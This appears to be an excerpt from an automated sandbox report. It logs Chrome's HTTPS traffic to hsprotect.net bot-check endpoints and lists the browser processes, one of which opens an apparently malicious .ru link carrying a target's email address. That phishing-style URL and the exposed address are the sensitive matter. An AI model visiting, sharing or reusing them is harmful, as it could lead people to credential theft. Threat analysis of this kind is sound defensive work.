                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://msft.hsprotect.net
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://msft.hsprotect.net/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:12:02 UTC153INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:12:01 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 354
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Connection: close
                                                                                      2025-01-09 04:12:02 UTC354INData Raw: 38 32 36 38 36 36 35 37 33 32 66 32 61 35 65 39 30 62 64 62 37 33 32 36 38 30 64 65 38 61 37 62 39 35 30 66 62 35 30 35 33 65 30 38 35 39 33 33 34 66 31 66 61 33 35 36 62 32 61 61 38 62 62 62 66 62 62 33 38 30 39 34 39 37 31 31 34 30 31 61 33 35 38 64 33 64 61 64 64 61 32 63 31 34 31 39 36 39 35 61 36 39 62 64 63 31 32 30 66 37 31 37 65 34 64 65 64 66 39 61 66 66 62 61 32 36 33 36 33 37 36 38 36 35 36 38 34 38 32 33 30 37 35 36 34 35 30 38 34 33 32 37 38 66 62 37 32 38 30 64 35 39 65 38 66 30 35 66 36 37 66 34 65 35 62 37 62 33 37 31 61 32 32 33 34 32 30 31 37 36 39 64 35 36 62 35 39 64 37 35 38 61 62 35 61 32 63 64 66 63 65 36 62 34 38 65 34 62 63 37 37 30 33 32 35 38 65 65 64 37 34 34 37 36 37 36 66 66 35 39 30 62 66 39 31 35 33 38 36 33 30 37 65 30 39
                                                                                      Data Ascii: 8268665732f2a5e90bdb732680de8a7b950fb5053e0859334f1fa356b2aa8bbbfbb380949711401a358d3dadda2c1419695a69bdc120f717e4dedf9affba26363768656848230756450843278fb7280d59e8f05f67f4e5b7b371a2234201769d56b59d758ab5a2cdfce6b48e4bc7703258eed7447676ff590bf915386307e09


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.164983135.190.10.964437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:12:02 UTC369OUTGET /api/v2/msft HTTP/1.1
                                                                                      Host: collector-pxzc5j78di.hsprotect.net
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:12:02 UTC284INHTTP/1.1 405 Method Not Allowed
                                                                                      Date: Thu, 09 Jan 2025 04:12:02 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Content-Length: 31
                                                                                      Allow: HEAD, POST, OPTIONS
                                                                                      Timing-Allow-Origin: *
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                      Connection: close
                                                                                      2025-01-09 04:12:02 UTC31INData Raw: 7b 22 65 72 72 6f 72 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d 0a
                                                                                      Data Ascii: {"error":"Method Not Allowed"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.164983234.107.199.614437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:12:02 UTC382OUTGET /ns?c=dfd0a870-ce3f-11ef-ae3b-e12a94f7ceb6 HTTP/1.1
                                                                                      Host: stk.hsprotect.net
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:12:03 UTC153INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:12:02 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 354
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Connection: close
                                                                                      2025-01-09 04:12:03 UTC354INData Raw: 33 38 31 34 64 34 38 64 34 31 63 37 66 61 64 61 32 62 64 32 33 66 33 33 34 36 37 31 38 62 35 35 64 65 61 64 38 34 37 33 36 31 33 35 35 34 31 31 63 31 65 64 31 62 36 64 30 35 66 64 31 39 39 31 33 35 64 39 31 34 30 32 34 65 38 35 35 65 65 33 61 33 61 32 36 31 64 39 39 37 38 64 62 30 31 36 38 34 39 62 61 39 33 35 37 39 36 39 38 35 35 35 37 31 35 38 35 31 34 39 31 33 61 66 34 62 61 31 63 30 34 39 30 39 38 36 65 30 30 66 31 63 33 39 36 63 35 64 66 64 37 64 37 63 65 35 30 32 66 61 64 35 61 39 66 31 37 32 31 39 64 36 32 33 63 62 32 65 61 31 30 36 39 33 63 37 63 64 62 31 66 33 35 62 34 39 62 63 35 65 34 31 63 30 65 32 36 61 61 62 64 33 37 33 31 65 35 34 66 37 64 63 64 35 36 39 64 66 32 39 62 61 33 62 35 34 34 66 63 39 65 34 36 39 39 66 64 64 37 38 38 31 34 30 62
                                                                                      Data Ascii: 3814d48d41c7fada2bd23f3346718b55dead847361355411c1ed1b6d05fd199135d914024e855ee3a3a261d9978db016849ba935796985557158514913af4ba1c0490986e00f1c396c5dfd7d7ce502fad5a9f17219d623cb2ea10693c7cdb1f35b49bc5e41c0e26aabd3731e54f7dcd569df29ba3b544fc9e4699fdd788140b


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.164983635.190.10.964437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:12:04 UTC650OUTPOST /api/v2/msft HTTP/1.1
                                                                                      Host: collector-pxzc5j78di.hsprotect.net
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 8963
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Origin: https://msft.hsprotect.net
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://msft.hsprotect.net/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:12:04 UTC8963OUTData Raw: 70 61 79 6c 6f 61 64 3d 61 55 6b 51 52 68 41 49 45 48 4e 33 61 30 74 77 57 57 74 42 59 6c 68 6a 44 78 41 65 45 46 59 51 43 45 6b 51 5a 31 74 61 56 58 6c 77 59 48 5a 6f 57 6b 45 50 45 41 67 44 42 51 45 45 41 51 73 48 43 77 41 41 41 41 51 4b 48 68 42 33 64 47 74 62 64 46 35 6e 48 58 68 4c 64 77 38 51 43 45 6b 51 63 56 70 72 52 52 41 49 48 77 4d 65 45 46 52 41 42 42 41 49 42 67 51 48 54 78 34 51 63 46 70 46 41 6d 70 33 63 41 42 2f 5a 57 73 50 45 41 67 51 42 67 74 58 42 77 49 4b 42 6c 63 51 48 68 42 67 5a 6b 45 42 56 30 56 38 59 33 77 43 51 51 38 51 43 42 41 46 55 51 64 55 43 77 55 41 42 68 41 65 45 48 46 61 63 77 5a 6e 64 77 73 4c 59 6e 56 64 44 78 41 49 45 41 51 48 56 67 6f 41 42 46 63 43 45 42 34 51 66 47 46 42 65 6c 4d 42 63 48 4e 78 58 6c 55 50 45 41 67
                                                                                      Data Ascii: payload=aUkQRhAIEHN3a0twWWtBYlhjDxAeEFYQCEkQZ1taVXlwYHZoWkEPEAgDBQEEAQsHCwAAAAQKHhB3dGtbdF5nHXhLdw8QCEkQcVprRRAIHwMeEFRABBAIBgQHTx4QcFpFAmp3cAB/ZWsPEAgQBgtXBwIKBlcQHhBgZkEBV0V8Y3wCQQ8QCBAFUQdUCwUABhAeEHFacwZndwsLYnVdDxAIEAQHVgoABFcCEB4QfGFBelMBcHNxXlUPEAg
                                                                                      2025-01-09 04:12:04 UTC400INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:12:03 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Content-Length: 932
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                      Access-Control-Allow-Origin: https://msft.hsprotect.net
                                                                                      Timing-Allow-Origin: *
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                      Connection: close
                                                                                      2025-01-09 04:12:04 UTC932INData Raw: 7b 22 64 6f 22 3a 6e 75 6c 6c 2c 22 6f 62 22 3a 22 63 33 4e 51 63 31 42 51 59 30 42 76 5a 79 78 6a 4c 43 77 76 59 33 34 75 65 79 59 72 65 53 31 37 66 58 31 36 4c 43 5a 35 4a 33 6f 73 4a 79 70 39 65 6e 6f 6d 65 79 38 71 4c 43 67 76 66 43 64 2b 65 33 6f 72 4b 48 6b 6d 66 6e 35 37 4a 69 74 39 66 53 6c 38 4c 53 6c 36 4a 79 78 37 4b 33 73 6f 4c 48 30 75 66 43 35 2b 4b 79 73 6c 52 31 56 30 4c 53 74 36 63 31 31 62 52 33 74 48 53 57 5a 52 56 32 68 71 55 33 78 77 61 56 51 6f 54 57 64 34 57 6e 42 76 58 69 63 72 62 44 42 63 61 6c 70 39 64 58 42 54 53 69 35 72 4b 6d 39 58 4a 6b 78 77 64 56 46 7a 61 55 39 2b 55 45 70 77 66 6b 64 6f 54 33 42 5a 56 6b 39 6e 54 46 68 31 56 45 5a 56 66 58 5a 4b 58 6c 70 76 56 6b 74 46 54 6d 67 69 49 69 55 75 4c 79 38 76 4a 55 74 6e 58 48
                                                                                      Data Ascii: {"do":null,"ob":"c3NQc1BQY0BvZyxjLCwvY34ueyYreS17fX16LCZ5J3osJyp9enomey8qLCgvfCd+e3orKHkmfn57Jit9fSl8LSl6Jyx7K3soLH0ufC5+KyslR1V0LSt6c11bR3tHSWZRV2hqU3xwaVQoTWd4WnBvXicrbDBcalp9dXBTSi5rKm9XJkxwdVFzaU9+UEpwfkdoT3BZVk9nTFh1VEZVfXZKXlpvVktFTmgiIiUuLy8vJUtnXH


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.164983735.190.10.964437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:12:04 UTC369OUTGET /api/v2/msft HTTP/1.1
                                                                                      Host: collector-pxzc5j78di.hsprotect.net
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:12:04 UTC284INHTTP/1.1 405 Method Not Allowed
                                                                                      Date: Thu, 09 Jan 2025 04:12:04 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Content-Length: 31
                                                                                      Allow: POST, HEAD, OPTIONS
                                                                                      Timing-Allow-Origin: *
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                      Connection: close
                                                                                      2025-01-09 04:12:04 UTC31INData Raw: 7b 22 65 72 72 6f 72 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d 0a
                                                                                      Data Ascii: {"error":"Method Not Allowed"}


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:23:10:53
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                      Imagebase:0x7ff7f9810000
                                                                                      File size:3'242'272 bytes
                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:1
                                                                                      Start time:23:10:53
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1996,i,4207191232076529853,15831843821875857869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                      Imagebase:0x7ff7f9810000
                                                                                      File size:3'242'272 bytes
                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:2
                                                                                      Start time:23:10:54
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com"
                                                                                      Imagebase:0x7ff7f9810000
                                                                                      File size:3'242'272 bytes
                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      No disassembly